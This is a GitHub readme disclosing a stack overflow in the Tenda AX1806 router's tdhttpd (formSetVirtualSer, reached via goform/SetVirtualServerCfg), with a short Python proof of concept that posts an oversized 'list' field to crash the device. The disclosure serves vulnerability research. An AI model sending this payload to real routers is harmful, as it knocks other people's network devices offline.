IoT-vuln/Tenda/AX1806/formSetVirtualSer at main · d1tto/IoT-vuln

History

Name		Name	Last commit message	Last commit date
parent directory ..
img		img
readme.md		readme.md

readme.md

Overview

The device's official website: https://www.tenda.com.cn/product/AX1806.html
Firmware download website: https://www.tenda.com.cn/download/detail-3306.html

Affected version

v1.0.0.1

Vulnerability details

tdhttpd in directory /bin has stack overflow vulnerability. The vulnerability occurrs in the formSetVirtualSer function, which can be accessed via the URL goform/SetVirtualServerCfg.

In function FUN_000631d0, the function sscanf is called to split it and copy to stack buffer without checking its length.

PoC

Poc of Denial of Service(DoS)

import requests

data = {
    b"list": b'A'*0x400+b'~'
}
res = requests.post("http://127.0.0.1/goform/SetVirtualServerCfg", data=data)
print(res.content)

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

formSetVirtualSer

formSetVirtualSer

readme.md

Overview

Affected version

Vulnerability details

PoC

Files

formSetVirtualSer

Directory actions

More options

Directory actions

More options

Latest commit

History

formSetVirtualSer

Folders and files

parent directory

readme.md

Overview

Affected version

Vulnerability details

PoC